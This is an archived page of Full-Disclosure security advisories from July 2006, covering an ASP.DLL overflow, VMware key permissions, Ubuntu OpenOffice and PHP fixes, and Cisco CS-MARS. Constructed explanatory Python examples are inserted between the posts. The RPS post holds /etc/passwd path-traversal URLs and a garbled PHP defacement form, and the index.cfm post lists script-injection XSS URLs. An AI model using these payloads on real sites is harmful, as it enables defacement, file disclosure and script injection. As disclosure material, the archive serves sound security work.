[Full-disclosure] ASP.DLL Include File Buffer Overflow

2006-07-19 Thread Brett Moore

= ASP.DLL Include File Buffer Overflow
=
= MS Bulletin posted:
= http://www.microsoft.com/technet/security/Bulletin/MS06-034.mspx
=
= Affected Software:
= IIS 5.0
= IIS 5.1
= IIS 6.0
=
= Public disclosure on July 19, 2006


== Overview ==

A buffer overflow exists in ASP.DLL that can be exploited by creating
a .asp file containing a parameter for the include SSI command.

  <!-- #include file=long buffer -->OVERFLOWDATA

The include function in ASP.DLL checks if the parameter is longer than
260 bytes. If it is then an error is caused, but before causing the
error a miscalculated copy is done.

  mov edi, [ebp+var_228]   ; load length of parameter
  cmp edi, 104h            ; check if larger than 260 bytes
  jbe short loc_
  mov esi, [ebp+var_22C]   ; load address of parameter
  lea eax, [edi+esi-104h]  ; load eax with the address of the last
                           ; 260 bytes of the parameter
                           ; (length of string+source of string)-104h
  lea edx, [ebp+var_211]   ; load edx with address on stack
  sub edx, eax             ;
  mov cl, [eax]            ;  \
  mov [edx+eax], cl        ;   do the copy
  inc eax                  ;   and overflow the stack
  test cl, cl              ;  /
  jnz short loc_7096D1F3   ;

Funnily enough, the solution was to remove this copy as the resulting 
data was never actually used.

== Exploitation ==

Exploitation requires the ability to upload or somehow create a file
with a .asp extension in a folder that will allow .asp processing.

Since ASP.DLL usually runs under the IWAM_ account, there is no
privilege escalation through this vulnerability. It is however possible
to bypass any security restrictions enforced by ASP. It also allows for
the execution of APIs that have no ASP equivalent.

== Solutions ==

- Install the vendor supplied patch.

== Credit ==

Discovered and advised to Microsoft February, 2006 by Brett Moore of
Security-Assessment.com

Same Bug Different App
http://www.security-assessment.com/Presentations/SBDA_Ruxcon_2005.ppt

In memory of;
  http://www.nsfocus.com/english/homepage/research/0305.htm
and
  http://www.eeye.com/html/research/advisories/AD20001003.html

== About Security-Assessment.com ==

Security-Assessment.com is a leader in intrusion testing and security
code review, and leads the world with SA-ISO, online ISO17799 compliance
management solution. Security-Assessment.com is committed to security
research and development, and its team have previously identified a
number of vulnerabilities in public and private software vendors
products.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
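The miscalculated copy in the listing above, modelled as an added example on a constructed include line. This is not code from the advisory or from Microsoft and it does not touch ASP.DLL: it reproduces the arithmetic of the listing (length check, source = start + len - 0x104, copy until NUL) so that the difference between a copy bounded by a NUL byte and one bounded by the parsed parameter length is visible. The assumption that the parameter sits between `file="` and a closing quote, and the trailing bytes after `-->`, are constructed for the demonstration.

```python
"""Model of the ASP.DLL include-parameter copy described in the advisory.

Added example, not the advisory's code. Nothing is written to a real
stack buffer; the functions return how many bytes each copy would write.
"""

TAIL_LEN = 0x104  # the 260-byte figure from the advisory


def build_include_line(param_len: int, trailing_len: int) -> bytes:
    """Constructed input: <!-- #include file="AAA..." -->BBB... plus a NUL.
    param_len 'A' bytes inside the quotes, trailing_len 'B' bytes after -->."""
    return (b'<!-- #include file="' + b"A" * param_len + b'" -->'
            + b"B" * trailing_len + b"\x00")


def include_param(line: bytes):
    """(offset, length) of the text between file=" and the closing quote,
    or None when the line carries no include parameter (assumed syntax)."""
    key = b'file="'
    start = line.find(key)
    if start < 0:
        return None
    start += len(key)
    end = line.find(b'"', start)
    if end < 0:
        end = line.find(b"\x00", start)
        if end < 0:
            end = len(line)
    return start, end - start


def miscalculated_copy_len(line: bytes) -> int:
    """Bytes the listing's loop would write before it sees a NUL byte.

    mov edi,[len]; cmp edi,104h; jbe skip   -> only long parameters are copied
    lea eax,[edi+esi-104h]                  -> source = start + len - 0x104
    mov cl,[eax]; mov [edx+eax],cl; inc eax; test cl,cl; jnz -> copy until NUL
    The loop is bounded by the NUL, not by the closing quote, so everything
    that follows the parameter on the line is copied as well.
    """
    found = include_param(line)
    if found is None:
        return 0
    start, length = found
    if length <= TAIL_LEN:          # jbe: short parameter, no copy at all
        return 0
    src = start + length - TAIL_LEN
    nul = line.find(b"\x00", src)
    return (len(line) if nul < 0 else nul) - src


def copy_overflows(line: bytes, dest_size: int) -> bool:
    """True when the modelled copy plus its terminator exceeds dest_size."""
    return miscalculated_copy_len(line) + 1 > dest_size


def bounded_tail_copy(line: bytes, dest_size: int) -> bytes:
    """The same tail copy bounded by the parsed length and the destination
    size instead of by a NUL byte; never reads past the parameter."""
    found = include_param(line)
    if found is None:
        return b""
    start, length = found
    if length <= TAIL_LEN:
        return b""
    n = min(TAIL_LEN, dest_size - 1)
    src = start + length - TAIL_LEN
    return line[src:src + n]


if __name__ == "__main__":
    line = build_include_line(300, 100)
    print("NUL-bounded copy would write", miscalculated_copy_len(line),
          "bytes; overflows a 261-byte buffer:", copy_overflows(line, TAIL_LEN + 1))
    print("length-bounded copy writes", len(bounded_tail_copy(line, TAIL_LEN + 1)), "bytes")
```

With a 300-byte parameter followed by 100 bytes of trailing data, the NUL-bounded copy writes 365 bytes (the last 260 bytes of the parameter, the five bytes of `" -->`, and the 100 trailing bytes) into a destination meant for 260, which is why the `OVERFLOWDATA` after the comment close matters in the advisory's example. The vendor fix removed the copy entirely, since the copied data was never used.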


[Full-disclosure] Multiple Vulnerabilities RPS

2006-07-19 Thread 0o_zeus_o0 elitemexico.org
Advisory #13
Title: Multiple Vulnerabilities RPS (rigter portal system)
Author: 0o_zeus_o0 ( Arturo Z. )
Contact: [EMAIL PROTECTED]
Website: www.elitemexico.org
Date: 18/07/06
Risk: medium
Vendor Url: http://rps.rigtersir.com/
Affected Software: RPS
Non Affected: RPS V 4

Info:

UPLOAD FILES
It allows the user to upload files without having administration privileges.

SQL injection
It allows the user to insert posts without having to be admin; with this one can perform XSS or HTML injection.

Example of upload files:

http://www.vuln.com/[path]/adm/photos/images.php
http://www.vuln.com/[path]//adm/down/files.php

Example Remote Execution:

http://www.vuln.com/[path]/index.php?id=../../../../../etc/passwd
http://www.vuln.com/[path]/index.php?id=../../../home/victim/public_html/index

Solution:

VULNERABLE VERSIONS
v1.0, 2.0 3.0

Contact information:
0o_zeus_o0
zeus@diosdelared.com
www.elitemexico.org

greetz: lady fire, Mi beba, olimpus klan team and elitemexico

Original Advisory: http://zeus.pccentervillaflores.com//13.txt

SQL injection in Articulos exploit:

<?php
/* RPS Defacer by: 0o_ZEUS_o0 OliMpusKlaN •~ FX ~•
   Date: 08/01/06
   Website: www.elitemexico.org */
?>
<html><head><title>RPS Defacer</title></head>
<body text=#FF bgcolor=#00>
<p align=center><font face=Verdana size=2><b><u><font color=#FF>RPS Defacer<br><br></font></u><font color=#FF>0o_ZEUS_o0 OliMpusKlaN <br /> •~ FX ~•</font></b></font></p>
<form method=POST ACTION="" name=rps_defacer>
<center><table border=0 cellpadding=5 cellspacing=0 style="border-collapse: collapse" width=40%>
 <tr><td width=100%><b><font face=Verdana size=1>Direccion:<br><input type=text name=url size=30 value=http://></font></b></td></tr>
 <tr><td width=100%><b><font size=1 face=Verdana>Autor:<br><input type=text name=autor size=20></font></b></td></tr>
 <tr><td width=100%><b><font face=Verdana><font size=1>Email:<br><input type=text name=email size=20></font></font></b></td></tr>
 <tr><td width=100%><b><font size=1 face=Verdana>Titulo:<br><input type=text name=titulo size=30></font></b></td></tr>
 <tr><td width=100%><b><font size=1 face=Verdana>Contenido: (Soporta HTML Inyection)<br><textarea rows=13 name=articulo cols=55></textarea></font></b></td></tr>
 <tr><td width=100%><p align=center><b><font face=Verdana size=1><input type=submit value=Enviar name=send> <input type=reset value=Restablecer name=delete></font></b></td></tr>
</table></center></div>
</form>
<?php
if($action="">$web= $_POST['url'];echo script LANGUAGE=\_javascript_\var pagina=\$web/adm/add_art.php\function redireccionar()
{location.href="">}setTimeout (\redireccionar()\, 0001);/script;}?
</body></html>

[Full-disclosure] VMSA-2006-0003 VMware possible incorrect permissions on SSL key files

2006-07-19 Thread VMware Security Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


- ---
   VMware Security Advisory

Advisory ID:   VMSA-2006-0003
Synopsis:  VMware possible incorrect permissions on SSL key files
VMware Player for Linux
VMware Workstation for Linux
VMware Server for Linux
VMware ESX Server 2.x
VMware Infrastructure 3

NOT VULNERABLE: VMware Player for Windows
NOT VULNERABLE: VMware Workstation for Windows
NOT VULNERABLE: VMware Server for Windows
VMTN Knowledge Base URL: http://kb.vmware.com/kb/2467205
Issue date:2006-07-18
Updated on:2006-07-18
CVE Name:  CVE-2006-3589
- ---

1. Summary:

The configuration program, vmware-config.pl, may not correctly set
file permissions on the generated SSL key files, which are used for
encrypting traffic for remote administrative connections.

VMware has given this issue a Priority 3 severity rating.

2. Relevant release:

VMware Player for Linux
VMware Workstation for Linux
VMware Server for Linux
VMware Infrastructure 3

NOT VULNERABLE: VMware Player for Windows
NOT VULNERABLE: VMware Workstation for Windows
NOT VULNERABLE: VMware Server for Windows

3. Problem description:

The script vmware-config.pl sets permissions on the key and
certificate files to safe values. However this script does not use
the safe_chmod() subroutine which reports errors on failure.
Instead, the native Perl chmod() function is used, without any
return code checking.

Because the safe_chmod() subroutine is not used and no return code
checks are performed, the user is not alerted if the chmod() fails.
Depending on the umask being used at the time this could leave the
key file readable to any local user on the system.

4. Solution:

VMware is working on a fix, and there is a workaround.  Manually
change the permissions on the key and certificate to their intended
values. The following commands would be appropriate on a default
installation:

# chmod 400 /etc/vmware/ssl/rui.key
# chmod 444 /etc/vmware/ssl/rui.crt

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2006-3589 to this issue.

5. References:

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3589

6. Acknowledgments

VMware would like to thank Nick Breese and security-assessment.com.

7. Contact:

http://www.vmware.com/security

Copyright 2006 VMware Inc. All rights reserved.


-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.4 (GNU/Linux)

iD8DBQFErFC+LsZLrftG15MRAmm8AKCj6Li52ztaGuPO78GyqXWaQSLTRgCaAnj3
3Wg2D5U/S9SkrzDSTR9OsWI=
=wppd
-END PGP SIGNATURE-
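A permission check for the key and certificate files named in the workaround, as an added example that is not VMware's code. The paths and intended modes (0400 for rui.key, 0444 for rui.crt) are the advisory's; the point demonstrated is the one the advisory makes about vmware-config.pl, that a chmod() whose result is never checked can fail silently, so each mode is verified after it is set and every file still readable by group or other is reported. The fixture creates throwaway files 0644 in a temporary directory so the example runs without touching /etc/vmware.

```python
"""Check and repair the permissions of the VMware SSL key and certificate.

Added example, not VMware's code. Intended modes come from the advisory's
workaround (chmod 400 rui.key, chmod 444 rui.crt).
"""
import os
import stat
import tempfile

# Intended modes from the advisory's workaround, keyed by default path.
EXPECTED_MODES = {
    "/etc/vmware/ssl/rui.key": 0o400,
    "/etc/vmware/ssl/rui.crt": 0o444,
}


def mode_of(path):
    """Permission bits of path without the file-type bits, e.g. 0o644."""
    return stat.S_IMODE(os.stat(path).st_mode)


def status_of(path, expected):
    """'ok' when no bit beyond the expected mode is set, 'missing' when the
    file is absent, otherwise text such as 'too-permissive:0o644'."""
    try:
        mode = mode_of(path)
    except FileNotFoundError:
        return "missing"
    except OSError as exc:
        return f"error:{exc.strerror}"
    if mode & ~expected:
        return f"too-permissive:{mode:#o}"
    return "ok"


def safe_chmod(path, mode):
    """chmod that reports failure instead of ignoring it, and confirms the
    mode really changed (the advisory says vmware-config.pl used a bare
    chmod() without a return-code check). Returns (True, '') or (False, why)."""
    try:
        os.chmod(path, mode)
    except OSError as exc:
        return False, f"chmod {mode:#o} {path}: {exc.strerror}"
    actual = mode_of(path)
    if actual != mode:
        return False, f"chmod {mode:#o} {path}: mode is still {actual:#o}"
    return True, ""


def audit(expected=EXPECTED_MODES):
    """Status of every file, without changing anything."""
    return {path: status_of(path, mode) for path, mode in expected.items()}


def enforce(expected=EXPECTED_MODES):
    """Apply the intended mode to each file that is too permissive and
    return the status afterwards, so a failed chmod is visible as 'unfixed'."""
    result = {}
    for path, mode in expected.items():
        before = status_of(path, mode)
        if before.startswith("too-permissive"):
            ok, reason = safe_chmod(path, mode)
            result[path] = "ok" if ok else f"unfixed:{reason}"
        else:
            result[path] = before
    return result


def constructed_fixture():
    """Throwaway rui.key/rui.crt created 0644 in a temporary directory, the
    state a vmware-config.pl run under a permissive umask could leave behind.
    Constructed test data, not VMware files. Returns the expected-mode map."""
    base = tempfile.mkdtemp(prefix="vmware-ssl-demo-")
    expected = {}
    for name, mode in (("rui.key", 0o400), ("rui.crt", 0o444)):
        path = os.path.join(base, name)
        with open(path, "w") as fh:
            fh.write("placeholder, not real key material\n")
        os.chmod(path, 0o644)
        expected[path] = mode
    return expected


if __name__ == "__main__":
    demo = constructed_fixture()
    print("before:", audit(demo))
    print("after: ", enforce(demo))
```

Run against the real paths with `audit()` to check an installation without modifying it; `enforce()` is the scripted form of the two chmod commands in the workaround, with the missing result check added.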


[Full-disclosure] [USN-313-2] OpenOffice.org vulnerabilities

2006-07-19 Thread Martin Pitt
===
Ubuntu Security Notice USN-313-2  July 19, 2006
openoffice.org2-amd64, openoffice.org2 vulnerabilities
CVE-2006-2198, CVE-2006-2199, CVE-2006-3117
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.10:
  openoffice.org2-common 1.9.129-0.1ubuntu4.1
  openoffice.org2-core   1.9.129-0.1ubuntu4.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

USN-313-1 fixed several vulnerabilities in OpenOffice for Ubuntu 5.04 and
Ubuntu 6.06 LTS. This followup advisory provides the corresponding
update for Ubuntu 5.10.

For reference, these are the details of the original USN:

  It was possible to embed Basic macros in documents in a way that
  OpenOffice.org would not ask for confirmation about executing them. By
  tricking a user into opening a malicious document, this could be
  exploited to run arbitrary Basic code (including local file access and
  modification) with the user's privileges. (CVE-2006-2198)
  
  A flaw was discovered in the Java sandbox which allowed Java applets
  to break out of the sandbox and execute code without restrictions.  By
  tricking a user into opening a malicious document, this could be
  exploited to run arbitrary code with the user's privileges. This
  update disables Java applets for OpenOffice.org, since it is not
  generally possible to guarantee the sandbox restrictions.
  (CVE-2006-2199)
  
  A buffer overflow has been found in the XML parser. By tricking a user
  into opening a specially crafted XML file with OpenOffice.org, this
  could be exploited to execute arbitrary code with the user's
  privileges. (CVE-2006-3117)


Updated packages for Ubuntu 5.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org2-amd64/openoffice.org2-amd64_1.9.129-0.1ubuntu4.1-1.diff.gz
  Size/MD5:    30102 940d431dbc93185558bfe215f0d1bd31

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org2-amd64/openoffice.org2-amd64_1.9.129-0.1ubuntu4.1-1.dsc
  Size/MD5:  934 46517c65ab2797905ae5fc54e18f093a

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org2-amd64/openoffice.org2-amd64_1.9.129-0.1ubuntu4.1.orig.tar.gz
  Size/MD5: 280390449 8fc86346a5ca070fd41cc35ccf0db891

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org2/openoffice.org2_1.9.129-0.1ubuntu4.1.diff.gz
  Size/MD5: 42651040 7eb1530f373880579e0b4f882d6f37d4

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org2/openoffice.org2_1.9.129-0.1ubuntu4.1.dsc
  Size/MD5: 2747 1df80499afc5fe76f527f67baede96aa

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org2/openoffice.org2_1.9.129.orig.tar.gz
  Size/MD5: 193239182 ca8c3fd5718fc31343abef213cb4df8d

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org2/openoffice.org2-common_1.9.129-0.1ubuntu4.1_all.deb
  Size/MD5: 22894532 9ceea05764f1f3c7c7fb6e9ba4cced06

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org2/openoffice.org2-dev-doc_1.9.129-0.1ubuntu4.1_all.deb
  Size/MD5:  4783358 d90c33a8f7d46ecb032e0b79a966cde0

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org2/openoffice.org2-java-common_1.9.129-0.1ubuntu4.1_all.deb
  Size/MD5:  2792520 8ff58905701deb746209f38d59e50fbe

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org2/openoffice.org2-l10n-en-us_1.9.129-0.1ubuntu4.1_all.deb
  Size/MD5:   588148 232eea25965ee05eb60579ec0c6680cf

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org2/ttf-opensymbol_1.9.129-0.1ubuntu4.1_all.deb
  Size/MD5:   145466 62a12f481a92cce78f521a2afeb60f42

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org2-amd64/openoffice.org2-base_1.9.129-0.1ubuntu4.1-1_amd64.deb
  Size/MD5:  2768862 e2e037a15d5aa56e0f5bde9300d78a7a

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org2-amd64/openoffice.org2-calc_1.9.129-0.1ubuntu4.1-1_amd64.deb
  Size/MD5:  3514372 0df198e3a69f04746605f52239b252b3

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org2-amd64/openoffice.org2-core_1.9.129-0.1ubuntu4.1-1_amd64.deb
  Size/MD5: 31007052 9bb773b5d9f762546389c33c410821a1

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org2-amd64/openoffice.org2-draw_1.9.129-0.1ubuntu4.1-1_amd64.deb
  Size/MD5:  1749028 06ad64a99ba5cddf8375b2a2a83bade0

http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org2-amd64/openoffice.org2-filter-so52_1.9.129-0.1ubuntu4.1-1_amd64.deb
  Size/MD5:27834 

Re: [Full-disclosure] Symantec 3300 E-mail Gateway dropping spoofed mails

2006-07-19 Thread Valdis . Kletnieks
On Wed, 19 Jul 2006 14:00:50 +1000, Josh L. Perrymon said:

> X-NAI-Spam-Report: 2 Rules triggered *  1.8 -- MIME_MISSING_BOUNDARY --

The first error message..

> RAW:  MIME section missing boundary *  0.5 -- MIME_BASE64_LATIN -- RAW:
> Latin  alphabet text using base64 encodi:

and the second..

> Content-type: multipart/alternative; boundary=HTMLDEMO44bc3b28b4ba5

OK so far...

> --HTMLDEMO44bc3b28b4ba5

And the *starting* boundary..

> Content-Type: text/html; charset=ISO-8859-1

I'll get back to this..

> Content-Transfer-Encoding: base64
>
> DQoNCkF0dGVudGlvbiBFbWFpbCBVc2Vycyw8YnI+DQo8YnI+DQpEdWUgdG8gcmVjZW50IHNl
> DQoNCkF0dGVudGlvbiBFbWFpbCBVc2Vycyw8YnI+DQo8YnI+Y3Vy
> (snipped)
> cm8uZ292LmF1IDxicj4NCg0KDQo=
>
>  end full

Umm.. An *ending* boundary would be considered at least *polite*. Actually,
required by the RFCs.  So the first error message is in fact correct.

I haven't actually *decoded* the text, and can't due to the (snipped),
but I'm willing to bet that the second complaint is that it's tagged with
charset=ISO-8859-1 when in fact all the text contained therein is actually
US-ASCII. RFC2046, section 4.1.2:

   In general, composition software should always use the lowest common
   denominator character set possible.  For example, if a body contains
   only US-ASCII characters, it SHOULD be marked as being in the US-
   ASCII character set, not ISO-8859-1, which, like all the ISO-8859
   family of character sets, is a superset of US-ASCII.  More generally,
   if a widely-used character set is a subset of another character set,
   and a body contains only characters in the widely-used subset, it
   should be labelled as being in that subset.  This will increase the
   chances that the recipient will be able to view the resulting entity
   correctly.

So again, the message is quite likely being impolite again.  And this is
the sort of impoliteness that spammers like to abuse.  And I believe that
even Microsoft MUAs are able to get this one right these days, so there's
really no excuse for anybody except a spammer.. ;)



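The two checks discussed in the reply above, run over a constructed message, as an added example that is not part of the thread. It uses the standard library's email parser to flag a multipart body whose closing boundary is missing (the parser records this as CloseBoundaryNotFoundDefect) and a text part labelled charset=ISO-8859-1 whose decoded body is pure US-ASCII, the case RFC 2046 section 4.1.2 says SHOULD be labelled US-ASCII. The boundary string is the one quoted in the thread; the headers, addresses and body text are made up for the example.

```python
"""Lint a MIME message for a missing closing boundary and a non-minimal
charset label. Added example, not from the thread."""
import base64
import email
from email import errors, policy

BOUNDARY = "HTMLDEMO44bc3b28b4ba5"   # boundary quoted in the thread


def build_sample(closed, charset, body=b"<br>Attention Email Users,<br>\r\n"):
    """Constructed multipart/alternative message with one base64 text/html
    part. closed=False leaves out the terminating --BOUNDARY-- line, which is
    the shape of the message quoted above."""
    lines = [
        "From: sender@example.invalid",
        "To: user@example.invalid",
        "Subject: constructed sample",
        "MIME-Version: 1.0",
        f"Content-type: multipart/alternative; boundary={BOUNDARY}",
        "",
        f"--{BOUNDARY}",
        f"Content-Type: text/html; charset={charset}",
        "Content-Transfer-Encoding: base64",
        "",
        base64.b64encode(body).decode("ascii"),
    ]
    if closed:
        lines.append(f"--{BOUNDARY}--")
    return "\r\n".join(lines) + "\r\n"


def mime_lint(raw):
    """Return a list of findings: a missing close boundary on the multipart
    body, and any text part whose charset label is broader than its content."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []
    # The parser keeps structural problems in msg.defects rather than raising.
    if any(isinstance(d, errors.CloseBoundaryNotFoundDefect) for d in msg.defects):
        findings.append("multipart body has no closing boundary")
    for part in msg.walk():
        if part.get_content_maintype() != "text":
            continue
        charset = (part.get_content_charset() or "us-ascii").lower()
        decoded = part.get_payload(decode=True) or b""   # base64 undone here
        if charset != "us-ascii" and all(b < 0x80 for b in decoded):
            findings.append(
                f"{part.get_content_type()} labelled charset={charset} "
                "but contains only US-ASCII")
    return findings


if __name__ == "__main__":
    for finding in mime_lint(build_sample(closed=False, charset="ISO-8859-1")):
        print("finding:", finding)
    print("well-formed sample:", mime_lint(build_sample(closed=True, charset="us-ascii")))
```

The first sample reproduces both complaints in the spam report; the second, with a closing boundary and a US-ASCII label, produces none. A body that really contains Latin-1 bytes keeps its ISO-8859-1 label without a finding, which is the distinction the RFC text draws.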

[Full-disclosure] DELL Hardware KeyLogger??

2006-07-19 Thread Andres Molinetti


http://virus.org.ua/unix/keylog/klog.htm

scaring...
Andy





Re: [Full-disclosure] DELL Hardware KeyLogger??

2006-07-19 Thread teh kids

kK 1 W1ll B173

No7 4s Sc4rY 4s 7H3 19NOR4nC3 4Nd L4CK OF 9OO9L3 Sk1lLs 7h47 JOO d1spl4Y.

M0ron

http://www.snopes.com/computer/internet/dellbug.asp

(loV3 jOo n3tt3rs)


On 7/19/06, Andres Molinetti [EMAIL PROTECTED] wrote:
>
> http://virus.org.ua/unix/keylog/klog.htm
>
> scaring...
> Andy






[Full-disclosure] New Ploblem in Index.cfm

2006-07-19 Thread saied hackeriran
   In The Name Of God

Discoverer:SaiedHacker
Group:HackeranShiraz
Critical Level : Dangerous


This matter happens in index.cfm when
We want to run some specific Functions
Such as action,event, and hacker 
Can start attacks such as XSS attack by
Using simple script or HtML code.


Exploit:
Http://www.Site.com/path/index.cfm?action=<script>
Http://www.Site.com/path/index.cfm?event=<script>
Http://www.Site.com/path/index.cfm?fuseaction=<script>

Xss:
Http://www.Site.com/path/index.cfm?action=<script>alert(SaiedHacker);</script>
Http://www.Site.com/path/index.cfm?event=<script>alert(SaiedHacker);</script>
Http://www.Site.com/path/index.cfm?fuseaction=<script>alert(SaiedHacker);</script>

Have fun
[EMAIL PROTECTED]
www.SaiedHackerPro.PersianBlog.com






Re: [Full-disclosure] DELL Hardware KeyLogger??

2006-07-19 Thread Maël Benjamin Mettler
Okay, problem solved. Stupid hoax.



[Full-disclosure] [USN-320-1] PHP vulnerabilities

2006-07-19 Thread Martin Pitt
=== 
Ubuntu Security Notice USN-320-1  July 19, 2006
php4, php5 vulnerabilities
CVE-2006-0996, CVE-2006-1490, CVE-2006-1494, CVE-2006-1608,
CVE-2006-1990, CVE-2006-1991, CVE-2006-2563, CVE-2006-2660,
CVE-2006-3011, CVE-2006-3016, CVE-2006-3018
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 5.10
Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.04:
  libapache2-mod-php4  4:4.3.10-10ubuntu4.5
  php4-cgi 4:4.3.10-10ubuntu4.5
  php4-cli 4:4.3.10-10ubuntu4.5

Ubuntu 5.10:
  libapache2-mod-php5  5.0.5-2ubuntu1.3
  php5-cgi 5.0.5-2ubuntu1.3
  php5-cli 5.0.5-2ubuntu1.3
  php5-curl5.0.5-2ubuntu1.3

Ubuntu 6.06 LTS:
  libapache2-mod-php5  5.1.2-1ubuntu3.1
  php5-cgi 5.1.2-1ubuntu3.1
  php5-cli 5.1.2-1ubuntu3.1
  php5-curl5.1.2-1ubuntu3.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

The phpinfo() PHP function did not properly sanitize long strings. A
remote attacker could use this to perform cross-site scripting attacks
against sites that have publicly-available PHP scripts that call
phpinfo(). Please note that it is not recommended to publicly expose
phpinfo(). (CVE-2006-0996)

An information disclosure has been reported in the
html_entity_decode() function. A script which uses this function to
process arbitrary user-supplied input could be exploited to expose a
random part of memory, which could potentially reveal sensitive data.
(CVE-2006-1490)

The wordwrap() function did not sufficiently check the validity of the
'break' argument. An attacker who could control the string passed to
the 'break' parameter could cause a heap overflow; however, this
should not happen in practical applications. (CVE-2006-1990)

The substr_compare() function did not sufficiently check the validity
of the 'offset' argument. A script which passes untrusted user-defined
values to this parameter could be exploited to crash the PHP
interpreter. (CVE-2006-1991)

In certain situations, using unset() to delete a hash entry could
cause the deletion of the wrong element, which would leave the
specified variable defined. This could potentially cause information
disclosure in security-relevant operations. (CVE-2006-3017)

In certain situations the session module attempted to close a data
file twice, which led to memory corruption. This could potentially be
exploited to crash the PHP interpreter, though that could not be
verified. (CVE-2006-3018)

This update also fixes various bugs which allowed local scripts
to bypass open_basedir and 'safe mode' restrictions by passing special
arguments to tempnam() (CVE-2006-1494, CVE-2006-2660), copy()
(CVE-2006-1608), the curl module (CVE-2006-2563), or error_log()
(CVE-2006-3011).


Updated packages for Ubuntu 5.04:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4_4.3.10-10ubuntu4.5.diff.gz
  Size/MD5:   281888 6b2f9b14e6b17fd16b39fc992370c700

http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4_4.3.10-10ubuntu4.5.dsc
  Size/MD5: 1469 e107321f5a864fec29aba0ddc4557bda
http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4_4.3.10.orig.tar.gz
  Size/MD5:  4892209 73f5d1f42e34efa534a09c6091b5a21e

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4_4.3.10-10ubuntu4.5_all.deb
  Size/MD5: 1128 e68858ad284ff509a9a7ba6004cd85b3

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/p/php4/libapache2-mod-php4_4.3.10-10ubuntu4.5_amd64.deb
  Size/MD5:  1657574 00032fa4aca5c15403f290cae27bfe38

http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-cgi_4.3.10-10ubuntu4.5_amd64.deb
  Size/MD5:  3275318 be667056767f298619d7c48d73f22c00

http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-cli_4.3.10-10ubuntu4.5_amd64.deb
  Size/MD5:  1647612 d615fd92ad1609108ec1e877ce748ade

http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-common_4.3.10-10ubuntu4.5_amd64.deb
  Size/MD5:   168182 ad4bd0b977814c2c3379235d76cf2ed2

http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-dev_4.3.10-10ubuntu4.5_amd64.deb
  Size/MD5:   348270 03f94109b0ea8c73d8d88e50e10efede

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/p/php4/libapache2-mod-php4_4.3.10-10ubuntu4.5_i386.deb
  Size/MD5:  1592870 

[Full-disclosure] Cisco Security Advisory: Multiple Vulnerabilities in Cisco Security Monitoring, Analysis and Response System (CS-MARS)

2006-07-19 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


Cisco Security Advisory: 
Multiple Vulnerabilities in Cisco Security Monitoring, Analysis and 
Response System (CS-MARS)

Document ID: 70728

Advisory ID: cisco-sa-20060719-mars

http://www.cisco.com/warp/public/707/cisco-sa-20060719-mars.shtml

Revision 1.0

For Public Release 2006 July 19 1600 UTC (GMT)

- ---

Contents


Summary
Affected Products
Details
Impact
Software Version and Fixes
Workarounds
Obtaining Fixed Software
Exploitation and Public Announcements
Status of this Notice: FINAL
Distribution
Revision History
Cisco Security Procedures

- ---

Summary
===

Cisco Security Monitoring, Analysis and Response System (CS-MARS)
software contains vulnerabilities related to third-party software and
the command line interface (CLI).

  * CS-MARS ships with an Oracle database. The database contains
several default Oracle accounts which have well-known passwords. If
access to the database is obtained, the default accounts may be
used to access sensitive information contained in the database.
  * CS-MARS ships with the JBoss web application server. A component of
the JBoss installation may allow a remote, unauthenticated user to
execute arbitrary shell commands with the privileges of the CS-MARS
administrator.
  * The CS-MARS CLI contains several vulnerabilities which may allow
authenticated administrators to execute arbitrary shell commands
with root privileges.

All vulnerabilities addressed in this advisory have been corrected in
CS-MARS software version 4.2.1.

Cisco has made free software available to address these vulnerabilities
for affected customers. There are no workarounds.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20060719-mars.shtml.

Affected Products
=

Vulnerable Products
+--

CS-MARS software versions prior to 4.2.1 are affected by
vulnerabilities addressed in this advisory.

To verify the version of CS-MARS software, use a SSH client to login
into the system administration command line interface with the pnadmin
